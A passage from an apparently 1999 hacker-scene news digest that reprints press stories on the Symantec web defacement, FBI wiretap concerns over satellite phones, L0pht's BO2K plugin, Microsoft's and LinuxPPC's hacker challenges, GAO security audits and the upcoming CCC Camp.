http://news.bbc.co.uk/hi/english/sci/tech/newsid_409000/409980.stm

C | Net
http://www.techweb.com/wire/story/TWB19990802S0002

Wired
http://www.wired.com/news/news/technology/story/21052.html

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2307804,00.html

Heise Online- German
http://www.heise.de/newsticker/data/fr-02.08.99-001/

ZDNet;

--------------------------------------------------------------
This story was printed from ZDNN, located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------

Symantec: Vandals didn't infect us
By Robert Lemos, ZDNN
August 2, 1999 2:02 PM PT
URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2307804,00.html

Internet vandals broke into the servers of network security and utilities firm Symantec Corp. Monday morning, defacing the company's Web site.

While the vandals claimed to have infected Symantec's network two months ago with a worm, quaintly dubbed Bloworm, the company denied Monday that any worm existed on its systems.

"There is no virus infection, no worm infection, and no danger to customers," said Richard Saunders, a spokesman for the Cupertino, Calif., company. "They didn't get in beyond posting a mildly offensive, but otherwise impotent, message on our home page."

The five cyber vandals, who identified themselves only by their handles, claimed otherwise.

"0ur w0rm iz spreading around (Symantec's) netw0rk and infecting (it's) f1lez, since about 2 months ago. phear," stated the group in a document of typically spelling-impaired hacker-speak. The document was left behind by the group after it broke into the servers of Symantec at about 5 a.m. PT Monday.

Worms are virus-like programs that infect systems through networks automatically and without the need for an unknowing user to open a file or run an application.
Symantec (Nasdaq:SYMC) has always been a popular target for Internet vandals looking for a hard nut to crack. The only difference: This time someone actually got in.

"What this incident does show is that you cannot be complacent towards this kind of threat," said Saunders.

The Symantec spokesman could not detail how the cyber vandals entered the company's network.

Symantec engineers took down the page within an hour of its posting, but not before the media in Europe got wind of the defacement. The BBC posted a story early Monday morning.

@HWA

16.0 Off The Hook Goes Shortwave
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Emmanuel

Adding to its impressive list of distribution methods "Off the Hook" now broadcasts on shortwave radio. "Off the Hook" is a weekly radio show dedicated to the issues and events of the hacker world. Not only is "Off The Hook" available via commercial broadcast radio, Real Audio and MP3, they will now be broadcasting on shortwave radio as well. You can listen in at 7415 kHz, Tuesdays at 8 pm EST.

Off The Hook
http://www.2600.com/offthehook/

@HWA

17.0 Feds Stop Satellite Biz due to WireTaps
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Code Kid

The Federal Communications Commission is holding up critical operating licenses for several small satellite phone companies until they have finished talking with the FBI. The CALEA Act passed in 1994 requires telephone companies to provide law enforcement with access to digital call information, including the ability to tap calls and determine the location of users. Several satellite phone companies are in long negotiations with the FBI to ensure that their systems comply with the law.

C | Net
http://www.news.com/News/Item/0,4,40048,00.html?st.ne.fd.gif.e

FBI wiretap worries slow satellite phones
By John Borland
Staff Writer, CNET News.com
August 3, 1999, 4 a.m.
PT
URL: http://www.news.com/News/Item/0,4,40048,00.html

The Federal Bureau of Investigation is putting the brakes--at least temporarily--on the satellite phone industry.

The FBI and other U.S. law enforcement agencies are worried that new space-based telephone systems, which theoretically allow a person to use a wireless phone from virtually anywhere on earth, will undermine their ability to wiretap telephone calls and trace criminals through cellphones.

Federal communications officials are holding up critical operating licenses for Globalstar and a handful of smaller satellite phone services while they negotiate with the FBI over wiretapping issues.

"These are borderless systems," said Mac Jeffery, a spokesman for Globalstar, a satellite phone provider scheduled to launch service in North America by the end of this year. "But it's not really a borderless world from the legal perspective yet."

Globalstar, Iridium, and a handful of other companies are leading an ambitious push to create a network of satellites that compete with traditional cellular phone service. The industry has already run into growing pains--Iridium, the first and largest system to launch, has run into severe financial difficulties after falling short of subscriber goals.

The wiretapping issue affects these companies and a handful of other non U.S.-based smaller satellite phone providers which are seeking licenses to operate in the United States, but have land-based equipment located in Canada.

A 1994 U.S. law, dubbed the Communications Assistance for Law Enforcement Act (CALEA), requires telephone companies to provide law enforcement with access to digital call information, including the ability to tap calls and determine the location of users.

That law has proven controversial. Privacy rights groups have protested that the FBI is encroaching on citizens' rights in their push to tap phone calls. Meanwhile, the FBI has said that industry proposals for following the law don't go far enough.
The Federal Communications Commission has yet to make a final ruling on the laws. The FBI's concerns with satellite phone providers do include figuring out how they fit into this law's framework, said one department official. But the Bureau's concerns are larger and more immediate, which has led to the current delay in licensing the services. Some of these satellite systems are unable to provide information on a caller's location. This information is critical for law enforcement, the FBI says, so it can know whether or not it can legally seek a U.S. court order to tap the phone calls. Canada's TMI Communications, which has seen its U.S. license application languish in the FCC for close to 16 months, faces this objection. Department of Justice officials are reportedly asking the company to include some kind of global positioning system in TMI phones that would at least determine which country a caller was in. TMI executives confirmed that they are discussing possible ways to solve the dilemma with U.S. law enforcement officials, but would not comment further. Because its system is configured differently, Globalstar doesn't face this issue. But because it wants to set up two of its four land-based receiving stations in Canada, it is in a different--and perhaps more technically challenging--situation. The FBI is concerned that it would have to go through Canadian government officials to win a wiretap on any calls going through these stations--an idea it strongly opposes. Allowing information about surveillance operations to go through foreign government channels would be a serious violation of national security, one FBI official said. All the companies involved are negotiating these issues with the FBI, and have each proposed a series of technical and policy solutions to the problem unique to their own networks. 
But according to Washington sources, senior trade and law enforcement officials from Canada and the United States have also discussed the problem, with an eye to settling national security concerns on a policy level with a minimum impact on industry development.

Meanwhile, the FCC is waiting and watching. The FBI and the Department of Justice have no official power to hold up the companies' operating licenses, but regulators are waiting for a resolution to the talks anyway.

"The parties are discussing this," said one FCC official, who asked to remain anonymous. "In the absence of indications that this is not moving forward, we would like to give that process a chance to work."

The dispute is similar to the fight being waged by U.S. software companies, who are barred from exporting strong encryption programs overseas. The FBI has lobbied to bar these exports--and has advocated for stricter rules governing use of encryption inside the United States--arguing that law enforcement needs to be able to crack encryption on encoded email messages of criminals and terrorists.

As with the software companies, the satellite firms are taking a conciliatory stance, hoping to get federal approval before the issue begins cutting into their official launch date.

Globalstar, which is slated to go live in North America by the end of this year, says it doesn't expect the issue to push that date back.

"Obviously some modifications are going to be made in order to make sure that national security is intact," said Andy Radlow, a spokesman for Vodafone AirTouch, the company handling Globalstar's North American business. "But we don't foresee launch delays."

@HWA

18.0 InfoCriminals Should Face Reasonable Penalties
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond

A very interesting opinion piece in Sunday's San Jose Mercury News asks some very poignant questions.
The article calls for reasonable sentences for InfoCriminals, methods to be developed so that they are caught and says that companies should be held just as responsible as InfoCriminals for security violations. (This is the first time I have seen the word "InfoCriminals" used. I like it.)

San Jose Mercury News
http://www7.mercurycenter.com/premium/business/docs/hotbutton01.htm

Published Sunday, August 1, 1999, in the San Jose Mercury News

Companies should be required to have their information security systems audited on a regular basis, says Steph Marr, vice president of Predictive Systems Inc.'s information security practice in Santa Cruz.

Setting the trap for hackers

A truly rational criminal system would provide near-certainty that transgressors would be caught -- and punish companies with lax security

BY STEPH MARR

THE recent spate of viruses has put us back on red alert -- the bad boys are still out there. And if they're caught, like David L. Smith, the alleged father of ``Melissa,'' they may face ridiculously high penalties -- penalties that are way out of line with their actual threat to society.

However, these penalties are necessary in order to establish some semblance of deterrence, because the probability of getting caught is near zero. We need to increase that probability.

Here's a formula that explains why we seem unable to stop hackers and other computer criminals: The value of a crime equals the penalty times the risk of getting caught.

The concept is simple. If the value of the ``prize'' is higher than the penalty multiplied by the risk of getting caught, most hackers will go for it. For example, if a hacker breaks into a bank's server and steals $1 million and the penalty for the crime is 10 years, it's worth it if the risk of getting caught is near zero. You do the math.

A truly rational criminal system would provide near-certainty that transgressors would be caught.
When caught, they would receive a penalty that is precisely commensurate with their crime. For example, if a hacker breaks into a bank's computer and steals $1 million, that's bank robbery. There are currently laws that address bank robbery and the penalties that apply. Similarly, if hacking occurs over state lines, wouldn't that constitute interstate transportation of stolen property?

My point is that rather than apply grossly overstated penalties to an InfoCrime, we should simply apply the penalties already established for ``real world'' parallels. But this only works if the criminals are likely to be caught -- which is not where we are today.

In recent years, few InfoCriminals have been caught and punished. To address this, we need responsible parties -- such as the government, private institutions and computer vendors -- to introduce greater risk into the hacker equation.

The first step would be to encourage better record keeping of who does what, and when. For example, handling virus problems could be comparatively easy if we refused to run ``anonymous'' programs. Microsoft has built this ability into its browser, as have others. It's a simple matter to set the system to refuse to run code that doesn't have a known source.

Furthermore, we need to foster a system whereby critical information, such as medical or financial records, simply cannot be accessed without a clear record of precisely who did what and when. This is the responsibility of the medical or the financial communities.

We need legislation to require these organizations to take strong measures to protect information kept about us, or for us. Some information may be collected as a normal part of transacting business with any organization, but limits on the use of that information need to be in place.

It is the responsibility of businesses and institutions to safeguard the information we give them. If they fail to do so, they should be penalized, along with the hackers.
If a high-school student can crack the Pentagon, then both the student and the Pentagon should be held accountable. If the Pentagon can't defend against our own students, how are they ever going to stand up to a true InfoWar from a foreign government?

Companies should be required to have their information security systems audited on a regular basis, just as they have their books audited. And, just as incorrect bookkeeping can lead to civil and criminal penalties, so too should information security errors.

For example, if it can be proved that a company could easily have done a better job of security, the company itself -- in addition, of course, to the hacker -- should be punished. Fines could be collected from the company to compensate those people whose information was lost or stolen. This is the only way we can make information security -- and the safety of our private information -- a standard business practice.

We need the vendors of consumer products to be held accountable for the products they create. If Intuit is going to be in the business of selling consumer financial management software, it should be responsible for building in the safeguards and the protections that are appropriate for that information. If Microsoft is going to be in the business of selling consumer operating systems, it should be responsible for providing an environment which is robust, free from known defects and protects consumer information, by default.

Users should be free to accept additional risks, but it should be informed consent.

Responsible software and responsible institutions would eliminate hacking without risk. Then we can move on to creating realistic penalties for InfoCrimes.

@HWA

19.0 L0pht Professional Plugin Pack For BO2K
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Megan A. Haquer

L0pht Heavy Industries has announced that they are developing a line of professional plugins for the robust remote administration tool BO2K.
The first of these plugins BOTOOL was released yesterday. BOTOOL allows the administrator to remotely manage files and the remote registry. This allows you to upload and download files securely, as well as copy, rename and delete files and directories. The remote registry editor allows you full registry editing capabilities over the BO2K secure command channel.

L0pht Heavy Industries
http://www.l0pht.com/

--------------------------------------------------------------
This story was printed from ZDNN, located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------

L0pht releases first BO2K plug-in
By Robert Lemos, ZDNN
August 4, 1999 2:38 PM PT
URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2309393,00.html

The controversial Back Orifice 2000 has some company.

On Tuesday, the white-hat hacking think-tank L0pht Heavy Industries posted its first of three plug-ins for the program, which has been alternately called a remote administration application or a hacking tool, depending on the user's point of view.

Called BOTOOL, the program allows users to perform point-and-click file transfers and registry editing. The L0pht intends to release at least two more plug-ins: BOPEEP and BOSCRIPT.

Back Orifice (BO2K), whose name spoofs that of Microsoft Corp.'s (Nasdaq:MSFT) Back Office, originally hit the Internet last year when the Cult of the Dead Cow, a less virginal hacking group, announced the program at the hacking confab known as DEF CON.

Last month, the Cult of the Dead Cow followed up with an upgraded version known as BO2K, which had racked up 128,776 app downloads as of July 22.

Once the "server" part of the program is installed on a target PC, a user -- or hacker -- can remotely control that PC through the Internet using the "client" program. The program runs on Windows 95/98, NT and 2000 and uses encryption to secure client-server communications.
Internet security firms and Microsoft have called the program malicious and have posted security warnings about it.

@HWA

20.0 MS Wants Free Publicity
     ~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

found on slashdot

In an obvious ploy to get free publicity Microsoft has set up a Windows 2000 machine on the internet and invited people to break in. Microsoft wants to create the most secure version of Windows ever, which is a laudable goal. It is hoped that this is not a primary testing method. Not only is attacking a system blind over the net probably one of the hardest things to do but the people who could actually accomplish this task have more important things to do other than testing Microsoft products for free. Of course a few months from now I'm sure we will hear how Windows 2000 stood up to X number of 'hack' attempts via the internet and is now the most secure version of Windows ever. Phalease.

http://www.windows2000test.com/ <- hack me

20.1 MS: a crashed site is hard to hack!
     ----------------------------------

This story was printed from Sm@rt Reseller, located at http://www.zdnet.com/sr.
--------------------------------------------------------------

Microsoft to Hackers: Crack This!
By David Raikow, Sm@rt Reseller
August 4, 1999 3:24 PM PT
URL: http://www.zdnet.com/sr/stories/news/0,4538,2309474,00.html

In an attempt to burnish its tarnished reputation for network security, Microsoft issued an open challenge on Tuesday to the hacking community. But potential testers barely got a chance to attempt to break Windows 2000’s security system, as the test server Microsoft offered crashed and stayed down for most of the past 24 hours.

Microsoft placed a web server running the latest beta of Windows 2000 and Internet Information Server (IIS) outside its firewalls, and invited the public to go after target files and user accounts it placed there. The company’s reason for doing so?

"We hope that this kind of open testing will allow us to ship our most secure OS yet," said a Microsoft spokesperson.

The hacking community was and is largely unimpressed, however. In its posted coverage, the Hacker News Network called the challenge "an obvious ploy to get free publicity...It is hoped that this is not a primary testing method." Members of the Linux-enthusiast site Slashdot for the most part concurred, accusing Microsoft of using anti-Microsoft sentiment for free auditing.

Meanwhile, the Linux community created a counter-challenge of its own. Tuesday afternoon, LinuxPPC, the developers and distributors of a PowerPC-native version of Linux, challenged hackers to crack one of its servers. Unlike Microsoft, which did not offer any kind of incentive or award to hackers, LinuxPPC is giving the machine to the first person to break in.

Whoops!

If it was meant as a publicity stunt, the Microsoft security challenge may have backfired. As soon as the site went online, Microsoft ran into technical difficulties with the test server. Early visitors reported problems with the home-page HTML and Javascript, some serious enough to prevent them accessing the page at all. Posted status logs indicate that the server had to be rebooted at least once because the system log was full, and some services were unavailable at reboot.

Most significantly, the server was offline for most of Tuesday due to what Microsoft described as "router problems". Though intermittently available Wednesday morning, the site was down at press time, and appears to have been pulled from DNS servers entirely; ping tests indicated the MS router was functional. Some Slashdot contributors reported seeing a notice that the site had been withdrawn, but no such notice is currently posted on any publicly accessible MS server.

A Microsoft spokesperson attributed some of the difficulties to thunderstorms in Seattle on Tuesday, but had no comment on the site's status at press time.
@HWA

21.0 China Seeks to Develop Infowar Capabilities
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Code Kid

A Chinese military newspaper covering the activities of China's People's Liberation Army has called for the recruitment of 'civilian hackers' and for the training of 'cyber warriors' at Army schools.

Internet News
http://www.internetnews.com/intl-news/article/0,1087,6_173341,00.html

Chinese Military Seeks to Train Cyber Warriors
August 3, 1999
Hans Lombardo, Managing Editor, asia.internet.com
International News Archives

[Hong Kong, CHINA] The Chinese military hopes to develop the capability of engaging in warfare over the Internet by training hackers to take the battle online.

The Liberation Army Daily (LAD), a mouthpiece of China's People's Liberation Army (PLA), recently called for the development of this capability.

The paper said that, by recruiting civilian hackers and training "cyber warriors" at Army schools, China could be prepared for an Internet war.

The call was made in response to several hacking incidents in the US and China after NATO's bombing of China's Belgrade Embassy.

The Army paper reported that a "battle" was fought on the Internet between US and Chinese hackers.

In May, Chinese hackers infiltrated various US government sites including the Department of Energy (DOE), the Department of the Interior (DOI), the US Embassy in China, and the Naval Communications Command.

Nearly a thousand US civilian sites were broken into in the two days following the bombing, sources said.

According to the Chinese military paper, US hackers responded by "counterattacking" several civilian sites in China.

More recently, the Chinese government has been accused of waging a cyber war against the outlawed Chinese sect, Falun Gong.

Webmasters in Canada, the US, and the UK have reported that their sites, hosting or linking to the sect's sites, were sabotaged or brought down by hackers traced to Chinese domains.
In addition to this, Beijing has moved its rhetorical campaign against the sect on to the Web. The China Internet Information Center and The China Daily have set up anti-Falun Gong sites.

Copyright 1999 internet.com Corp. All Rights Reserved. Legal Notices, Reprints.

@HWA

22.0 Online Banking Still Risky Congress Says
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Inf0rmant

Over 6 million Americans use the internet to do their banking, pay bills, transfer money, apply for loans, etc. A new report released by the General Accounting Office examined 81 financial institutions and found that 35 of them, about 44 percent, had not taken all the risk-limiting steps regulators had recommended. Unfortunately the report did not examine the client side security of internet banking. With programs like NetBus and BO2K floating around that is where the real danger lies.

Nando Times
http://www.nandotimes.com/technology/story/body/0,1634,77392-122285-862902-0,00.html

Many banking firms' online options still risky, GAO says

Copyright © 1999 Nando Media
Copyright © 1999 Associated Press

By MARCY GORDON

WASHINGTON (August 3, 1999 10:57 a.m. EDT http://www.nandotimes.com) - Internet banking carries more risk than the traditional bricks-and-mortar variety, yet 44 percent of the financial institutions in a survey hadn't taken all the steps deemed necessary to limit risks, congressional investigators said in a new report.

The number of banks, thrifts and credit unions offering Internet banking has nearly tripled over the past year, and more than 6 million Americans go online to transfer money between accounts, pay bills, check account or investment balances and apply for loans.

Some lawmakers are concerned about the safety and security of online banking and the possibility that consumers could lose money or have their financial privacy breached by hackers.

"The American banking system has proven capable of providing full security and privacy," said Rep. Spencer Bachus, R-Ala., chairman of the House Banking subcommittee on monetary policy. "Our challenge is making sure the current rush to technology does not outpace that proven ability."

The new report by the General Accounting Office, Congress' investigative arm, concludes that Internet banking is by nature riskier than conventional banking. The GAO's review of banking regulators' examinations of 81 financial institutions found that 35 of them, about 44 percent, hadn't taken all the risk-limiting steps regulators have said are needed.

The report was being released Tuesday at a hearing of Bachus's subcommittee.

It found, for example, that the boards of directors of some financial institutions had failed to approve strategic plans for Internet banking, and some institutions lacked policies and procedures covering online operations.

The report noted that despite these deficiencies, the review - conducted from April 1998 to May 1999 - didn't turn up any financial losses or security breaches in online banking.

However, the GAO auditors said, the sample of bank examinations reviewed was too small to support strong conclusions about the banking industry.

Relatively few examinations have been conducted because Internet banking is fairly new and examiners have focused on the banking industry's efforts to solve the Year 2000 computer problem, the GAO said.

In a related development, federal regulators reported Monday that 99 percent of the nation's federally insured banks, thrifts and credit unions have successfully completed preparations for the millennial date change.

Many major U.S. banks now offer Internet banking, supplementing their traditional branch services. In addition, there has been a recent push toward virtual, branchless banking, with online brokerage firm ETrade acquiring Telebanc Financial for $1.6 billion and Bank One launching WingspanBank.com.
Yet, even with the explosive growth of electronic commerce and online investing, most consumers are still somewhat hesitant about conducting financial transactions on the Internet, and even more so when it comes to managing their finances.

According to a June report by investment firm Goldman Sachs, only as many as 4 percent of U.S. households currently use online banking products. That number is expected to jump to about 20 percent by 2002.

@HWA

23.0 NIPRNet Access Restricted
     ~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by evilwench

A directive to eliminate unauthorized access to the Non-Classified IP Router Network will soon be issued from The Office of the Secretary of Defense. DOD is cracking down on unofficial connections to NIPRNet in an effort to increase security.

Government Computer News
http://www.gcn.com/vol18_no24/news/351-1.html

August 2, 1999

DOD will crack down on access to Niprnet

By Bill Murray
GCN Staff

The Office of the Secretary of Defense soon will issue a directive to eliminate unauthorized back-door access to the Non-Classified IP Router Network.

“It’s being worked on right now,” said Air Force Maj. Gen. John H. Campbell, vice director of the Defense Information Systems Agency, who spoke at length recently about much of the work on DISA’s plate.

“Unless you have a waiver with a specific reason,” Defense Department agencies will not be allowed to maintain these unapproved links, Campbell said in a recent interview.

It’s unofficial.

DOD officials are cracking down on unofficial connections to improve security, he said. “The NIPRnet grew up around convenience, not security,” Campbell said.

With electronic commerce, logistics and other business processes heavily reliant on the Internet, DISA officials are using eight official NIPRnet gateways to improve access, Campbell said.
Meanwhile, regarding the Defense Information Infrastructure’s Common Operating Environment, senior DOD brass recently reaffirmed their support for the DISA-run interoperability effort, Campbell said.

The department’s work on developing an enterprisewide systems plan, known as the Global Network Information Enterprise initiative, will not eliminate DII COE, he said, echoing comments made recently by Marvin Langston, DOD’s deputy chief information officer [GCN, May 10, Page 1].

Campbell said DOD officials are also pleased with the progress of Defense Message System installations. More than 210 sites worldwide use it, he said. Organizational use doubled during the past two months, while AUTODIN use decreased, Campbell said.

DISA’s Joint Interoperability Test Command is testing DMS Release 2.1, Campbell said. “The directories and infrastructure are stable and responsive,” he said. Message exchange, delivery, speed of service and other critical performance measures “appear to be doing well,” he said.

DISA is planning several pilots later this year in support of medium-grade messaging, a managed commercial e-mail service targeted at users who do not need command and control capabilities, Campbell said. Medium-grade messaging will use DOD public-key infrastructure software certificates, he said.

Campbell also praised the way DOD handled the Melissa virus. He said the department’s systems defense team worked with software vendors to ensure software patches were available for DOD users to download within six hours of the first reports of the outbreak.

“By midnight, both patches worked, and they were posted on a Web site,” said Campbell, who is commander of the department’s Joint Task Force for Computer Network Defense. Campbell said he was paged about the first DOD Melissa infections at 6:30 p.m. on March 26.
The department’s Computer Emergency Response Center officials from each service asked organizations to post banners on their networks asking users not to open e-mail messages with subject headers reading “important message from,” even if they knew the sender.

CERC has primary, day-to-day interaction with DOD organizations, Campbell said, and it reports to the task force, which is primarily concerned with organized attacks on Defense systems.

For example, no such attacks materialized during Operation Allied Force, Campbell said. “There was quite a bit of hacker activity from Serbia, but by and large it falls into the nuisance category,” such as defacing Web sites, he said.

Network Associates Inc. of Santa Clara, Calif., and Symantec Corp. of Cupertino, Calif., the companies that produced the patches for Melissa, hold antivirus software licenses with DISA.

Campbell said DISA officials have committed to giving the task force $3.2 million in fiscal 2000.

@HWA

24.0 Gov Employees Personal Privacy at Risk
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Sarge

Information stored on the National Finance Center's computer systems, including sensitive government personnel and financial information, is at risk of disclosure or destruction. The GAO report found that the NFC, under the Agriculture Department's control, had given legitimate users too much access. The NFC said it has completed some corrective actions and is working on the rest.

Federal Computer Week
http://www.fcw.com:80/pubs/fcw/1999/0802/web-nfc-8-3-99.html

AUGUST 3, 1999 . . . 13:20 EDT

GAO finds security lax for federal employees' personal info

BY COLLEEN O'HARA (ohara@fcw.com)

Weak access controls are placing sensitive government personnel and financial information stored on the National Finance Center's computer systems at risk of disclosure or destruction, according to a new General Accounting Office report.
The Agriculture Department's NFC operates financial systems such as payroll/personnel and accounting systems for the USDA and about 60 other federal organizations. The NFC also maintains the records of the multibillion dollar Thrift Savings Program, a type of 401(k) program for federal employees.

The GAO concluded that problems with NFC's access control "placed sensitive personnel information at risk of disclosure, critical financial operations at risk of disruption and assets at risk of loss."

Logical, system software and physical access controls are designed to protect computer databases from enabling unauthorized users to access or change the data stored in the systems.

The GAO found that NFC had given legitimate users too much access to financial and sensitive personal information. For example, GAO found that 86 users had the ability to read and alter any data stored on tape regardless of other security software controls that were in place. NFC said they have taken steps to limit this access, according to the report.

In addition, GAO found that users could bypass certain access controls and gain unauthorized access to financial and other sensitive data that the NFC maintains or cause system failures. For example, the system software that controls batch processing allowed any user with the ability to execute a batch program also to shut down the system or turn off features such as the security software.

In its response to the report, the NFC said it has "already completed corrective actions on most of the items and [it has] planned appropriate corrective actions on the rest."

@HWA

25.0 Other Security Challenges Offered
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Space Rogue

Yesterday Microsoft placed a Windows 2000 machine outside of its firewall and asked people to break into it. Today the folks at LinuxPPC have issued a similar challenge except they are offering the machine itself to the person who breaks in while Microsoft has not offered any incentive.
The Microsoft site was down most of the day yesterday and the LinuxPPC site was unreachable this morning when we attempted to check it. Companies need to realize that these "Hacker Challenges" are not valid testing methods and are nothing more than publicity stunts. If you want a valid security assessment then spend the money and hire an independent third party to review your product.

Windows 2000 Test
http://www.windows2000.com

Linux PPC
http://crack.linuxppc.org/

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2309474,00.html

See also a previous article in the HNN Buffer Overflow section

The Hacker Challenge
http://www.hackernews.com/orig/chall.html

Reprinted below from an earlier version of HNN

The Hacker Challenge
By: Qubik (qubik@bikkel.com)

You have probably read about them and some of you may have even participated in one or two. Hacker challenges; where you're asked to bypass the latest security measure implemented into technology which is already, prior to testing, dubbed as the latest in computer protection. But for what in return? Most challenges offer a reward of some sorts, a reward which is more often than not, a five or six figure with a dollar sign placed neatly at the beginning.

So just what is the deal with these challenges? What purpose do they really serve and are they just marketing ploys?

I'd like you to imagine for a moment that you're an administrator of a small corporate network. It's not the most exciting of jobs, and you don't have time to keep up with the latest goings-on in the security scene. Your network has been attacked a few times before, and you start to think about upgrading your security. So where do you start?

Where else would you start, but the internet? It's the world's largest resource, and every good company dealing with network security, is bound to be on the internet somewhere.
So you use a search engine or two and you come across a web site for a new state of the art firewall, whose manufacturers claim it resisted every hacker that attempted to hack it at a recent hacker convention. You're amazed, surely their high price tag is nothing for complete security!?

Only what if it is all a clever ploy, haven't you got to ask yourself just how many people actually tried to hack into that particular piece of software? Haven't you got to look into the reputation of the manufacturer? Of course you do! To be sure, you've got to ask for the cold hard facts, not the marketing babble!

There are serious flaws in many hacker challenges, not the least being that most 'real' hackers only hear about them after they've finished. This makes you wonder just who took part, and how they found out about it.

It's not uncommon for hackers and security analysts to earn wages in excess of six figures, and to earn such wages, you've got to be either very lucky, or very busy. So what's your guarantee that a hacker who actually knows what he is doing, actually took the time out to earn a, comparatively, small ten thousand? You have no guarantee at all, why on earth should he or she bother?

Next ask yourself whether real hackers would want to find all those bugs in that new technological innovation. Surely they're only going to end up making their job, of hacking, harder by pointing them out?

However, a low level source code analysis of a piece of software or a close look at hardware by reputable third party security analysis company will delay product ship times and cost a lot more than setting up a hacker challenge. Not to mention that it has nowhere near the same marketing punch. Display your product at an upcoming convention and let people bang on it for a weekend and then claim "Product X survives Hacker Challenge." Makes a great press release.

It all seems rather corrupt, with companies hiding the truth and rubbing their hands at the millions they make.
A ten thousand dollar reward seems rather pathetic, when you're earning ten times that kind of money. Surely these companies know this, are they in fact attempting to social engineer the hackers or maybe worse their customers?

But it's not all like that, there are plenty of genuine challenges out there. Some have been set up to test software and, now more and more, hardware, others testing entire networks. For example, recently the Quebec government is enlisting the aid of hackers to test its networks and to research new ways of protecting those networks.

So what can we say about hacker challenges? Do they really prove how secure a product is? I don't think so, the fact that most aren't officially announced to the hacker public and that they are often deliberately misinterpreted, doesn't give a good impression. But then, who should a company go to? It's not the easiest of tasks in the world, to announce such a challenge.

Hack at your own discretion, don't be afraid to take part in a hacker challenge, but don't take the word of the manufacturer, when they say it's secure, just because a few passers by a convention typed a few keys on a keyboard. There will always be flaws in hardware and software, it's up to us, the true hackers, to find and fix them, whether we do it for the companies' marketing campaign, or for personal gratification.

@HWA

25.1 Software developer offers hacker challenge
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://technology.news.com.au/techno/4108922.htm

Developer issues hacker challenge
By JENNIFER FORESHEW
3aug99

A SMALL Sydney company that has developed software designed to make Web sites hack-proof, has thrown out a challenge to crack the technology.

Creative Digital Technology (CDT) has developed software which, when downloaded, makes a site secure.

"We are prepared to stand behind that financially by offering a prize to universities to see if they can do what our developers haven't been able to do," CDT chief operating officer Philip Burton said.

CDT, which developed the country's first SET (Secure Electronic Transaction) enabled products, is launching the SecurePage product at Internet World 99 this week.

"We can protect any Web site," CDT chief executive Bahram Boutorabi said.

"The first version of the product runs on Microsoft's Internet Information Server platform, but we are planning to roll out across all platforms."

Mr Boutorabi, who is also technology officer, said many sites could be hacked because they were developed using mostly straight text.

"We have developed the technology to put something into Active Server Pages, HTML, Net Commerce Mark-up Language and XML, which represents a signature that someone has made against that page," Mr Boutorabi said.

Any attempt to alter a Web site's content would result in action being taken by the system, which is protected by 192-bit, Triple-DES encryption.

"If the contents of that page have been altered for any reason it will stop serving that content out and serve it from its own content area, where everything is fully encrypted," Mr Boutorabi said.

"SecurePage enables an administrator to put a disc into the system, run the administration and tell it to sign all of the pages with their password.

"To alter the code or text, you have to have administrative access to change the content or to stop the system."

Mr Burton, who is also a senior partner in CDT, said the company began working on the technology after attacks on high-profile Web sites.

"This came about from evidence that significant Web sites were being hacked and destroyed.

"We believed we could deliver a protection device in software form that could be downloaded from our Web site by whoever was hosting that particular site."
CDT declined to reveal further details of the technology pending approval of a patent on SecurePage.

If you decide to take up CDT's challenge to crack its software, Computers & High Technology wants to know. E-mail us at auscomp@ozemail.com.au - but only if you are successful.

@HWA

26.0 CCC Camp About to Get Under Way
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Frank
The organizers of CCC Camp continue their preparations for this weekend. It is expected that 3000 people will descend onto a field outside Berlin where they will share secrets of technology and discuss issues that affect us all. And pick a few locks.

Wired
http://www.wired.com/news/news/culture/story/21104.html?wnpg=1

HNN Cons Page
http://www.hackernews.com/cons/cons.html

Chaos in Berlin
by Steve Kettmann

3:00 a.m. 5.Aug.99.PDT
BERLIN -- This weekend's Chaos Communication Camp outside East Berlin will be more than just a good time, event organizers say.

The three-day event will be a combination hacker-fest, technology be-in, workshop smorgasbord, celebration of camping and swimming, and lock-picking seminar -- with metal locks, for a change.

Around 3,000 people are expected to attend, each paying an entrance fee of DM150 (US$82).

See also: Geekstock: German Hackfest

The event will be the first of its kind in Germany, but it draws on the tradition established with two similar events in the Netherlands. CCC organizers have consulted with the people behind Hacking in Progress, the most recent of which was held outside of Amsterdam in scorching weather two summers ago.

"We've worked a lot with the Amsterdam people," said Chaos Computer Club spokesman Andy Muller-Maguhn. "Five of them even moved to Berlin for three months to help us get organized, and another 20 are coming for the camp.

"HIP was a great experience, but the workshop part of the program was a catastrophe. The heat was so bad and they had tents rented from a circus.
